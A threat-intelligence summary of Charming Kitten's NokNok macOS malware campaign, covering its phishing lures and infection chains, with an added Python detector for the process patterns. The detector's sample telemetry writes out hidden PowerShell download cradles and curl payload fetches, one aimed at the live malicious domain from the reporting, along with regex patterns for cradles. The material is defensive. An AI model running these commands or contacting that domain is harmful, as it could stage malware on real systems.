Charming Kitten Hackers Use New ‘NokNok’ Malware for macOS

Cyber Security Threat Summary:
“Security researchers observed a new campaign they attribute to the Charming Kitten APT group where hackers used new NokNok malware that targets macOS systems. The campaign started in May and relies on a different infection chain than previously observed, with LNK files deploying the payloads instead of the typical malicious Word documents seen in past attacks from the group” (Bleeping Computer, 2023).

Charming Kitten has been attributed to the Islamic Revolutionary Guard and has launched various campaigns against foreign adversaries since at least 2015. In September 2022, the U.S. government managed to identify and charge members of the threat group.

In previous campaigns, the group relied on macro-based infection methods, but it has since switched to LNK files to deploy its payloads. This follows the same trend as many other threat actors, who are looking to circumvent the new protections Microsoft introduced. To lure victims, the group poses as nuclear experts from the U.S. and approaches targets with an offer to review a draft on foreign policy topics. In many cases, the attackers insert other personas into the conversation to add a sense of legitimacy and establish a rapport with the target. Charming Kitten’s use of impersonation and fake personas in phishing attacks has been documented before, as has its use of ‘sock puppets’ to create realistic conversation threads.

Security Officer Comments:
Using the phishing messages to gain the victim’s trust, the threat actors send a malicious link that contains a Google script macro, which redirects the victim to an attacker-controlled Dropbox URL. This external source hosts a password-protected RAR archive containing a malware dropper that leverages PowerShell code and an LNK file to stage the malware from a cloud hosting provider. Eventually, through user interaction, the final payload, GorjolEcho, is dropped. This simple backdoor accepts and executes commands from the attackers. To avoid raising suspicion, GorjolEcho opens a PDF on a topic relevant to the conversation the attackers previously had with the target.

“If the victim uses macOS, which the hackers typically realize after they fail to infect them with the Windows payload, they send a new link to “library-store[.]camdvr[.]org” that hosts a ZIP file masquerading as a RUSI (Royal United Services Institute) VPN app” (Bleeping Computer, 2023). The AppleScript inside that ZIP issues a curl command to fetch the NokNok payload, which establishes a backdoor on the victim’s system. NokNok generates a system identifier and then uses four bash script modules to set up persistence, establish communication with the command and control (C2) server, and exfiltrate data to it.
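Both infection chains described above leave a recognisable parent/child process pattern on the endpoint: on Windows, explorer.exe launching a hidden PowerShell with a download cradle when the LNK is opened; on macOS, osascript (the AppleScript runner) spawning curl to pull the NokNok payload. The following detector is an added example for this summary, not code from Proofpoint, Bleeping Computer or the campaign itself. It runs three simple rules over constructed process-execution telemetry; the record layout, hostnames and `*.example.invalid` URLs are invented for the example, while the watchlist entry is the domain named in the reporting above, refanged.

```python
"""Flag the process chains described in the Charming Kitten / NokNok reporting.

Added illustration only: the telemetry records below are constructed, not real
EDR output, and the field names are an assumption about what an EDR exports.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    host: str       # endpoint name (constructed)
    platform: str   # "windows" or "macos"
    parent: str     # parent process image name
    image: str      # child process image name
    cmdline: str    # full command line of the child


# Domain named in the reporting above (defanged there as library-store[.]camdvr[.]org).
KNOWN_BAD_HOSTS = {"library-store.camdvr.org"}

# PowerShell download cradles commonly used to stage a payload from cloud hosting.
WIN_DOWNLOAD_CRADLE = re.compile(
    r"(downloadfile|downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer|net\.webclient)",
    re.I,
)
WIN_HIDDEN_WINDOW = re.compile(r"-w(indowstyle)?\s+hidden", re.I)
URL_HOST = re.compile(r'''https?://([^/\s"']+)''', re.I)


def detect(events):
    """Return (host, rule_name) pairs for every event that matches a rule.

    Rule 1: LNK-style launch, explorer.exe -> hidden PowerShell with a download cradle.
    Rule 2: AppleScript (osascript) spawning curl, directly or via a shell wrapper.
    Rule 3: any command line that references a host on the watchlist.
    """
    findings = []
    for e in events:
        parent, image, cmd = e.parent.lower(), e.image.lower(), e.cmdline
        if (e.platform == "windows" and parent == "explorer.exe" and image == "powershell.exe"
                and WIN_HIDDEN_WINDOW.search(cmd) and WIN_DOWNLOAD_CRADLE.search(cmd)):
            findings.append((e.host, "lnk_powershell_download_cradle"))
        if (e.platform == "macos" and parent == "osascript"
                and (image == "curl" or re.search(r"\bcurl\b", cmd))):
            findings.append((e.host, "applescript_curl_fetch"))
        for host in URL_HOST.findall(cmd):
            if host.lower() in KNOWN_BAD_HOSTS:
                findings.append((e.host, "known_c2_host"))
    return findings


# Constructed sample telemetry: three malicious-looking events and two benign ones.
SAMPLE_EVENTS = [
    # Windows: user opens the LNK; explorer.exe runs a hidden PowerShell that fetches a stage.
    ProcEvent("ws-01", "windows", "explorer.exe", "powershell.exe",
              "powershell.exe -WindowStyle Hidden -NoProfile -Command "
              "(New-Object Net.WebClient).DownloadFile('https://cloud.example.invalid/stage.bin', "
              "'C:\\Users\\Public\\stage.bin')"),
    # Windows: ordinary admin use of PowerShell from a console; should not fire.
    ProcEvent("ws-02", "windows", "cmd.exe", "powershell.exe", "powershell.exe Get-Service"),
    # macOS: AppleScript in the fake VPN app runs curl against the reported domain.
    ProcEvent("mac-01", "macos", "osascript", "curl",
              "curl -s -o /tmp/.vpn/nn https://library-store.camdvr.org/nn"),
    # macOS: same behaviour hidden behind a shell wrapper.
    ProcEvent("mac-02", "macos", "osascript", "sh",
              'sh -c "curl -fsSL https://cdn.example.invalid/p -o /tmp/p"'),
    # macOS: developer running curl by hand from Terminal; should not fire.
    ProcEvent("mac-03", "macos", "bash", "curl", "curl -I https://www.example.invalid"),
]


if __name__ == "__main__":
    for host, rule in detect(SAMPLE_EVENTS):
        print(f"{host}: {rule}")
```

Rule 2 keys on the parent being osascript rather than on curl alone, because curl from a user shell is routine on developer Macs; rule 1 likewise requires both the hidden window and a cradle so that interactive PowerShell use does not fire. The watchlist rule is the only one tied to this specific campaign, and it is the first to go stale, which is why the behavioural rules carry the weight.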

NokNok also gathers system information, including the OS version, running processes, and details of installed applications. It encrypts all collected data, base64-encodes it, and then exfiltrates it. The Proofpoint researchers note that NokNok likely has additional modules that carry out espionage-related functions.

NokNok shares some similarities with the GhostEcho backdoor, whose modules allow it to take screenshots, execute commands, and remove artifacts; NokNok likely has similar functions. “Overall, this campaign shows that Charming Kitten has a high degree of adaptability, is capable of targeting macOS systems when necessary, and highlights the growing threat of sophisticated malware campaigns to macOS users” (Bleeping Computer, 2023).

Link(s):
https://www.proofpoint.com/us/blog/
https://www.bleepingcomputer.com/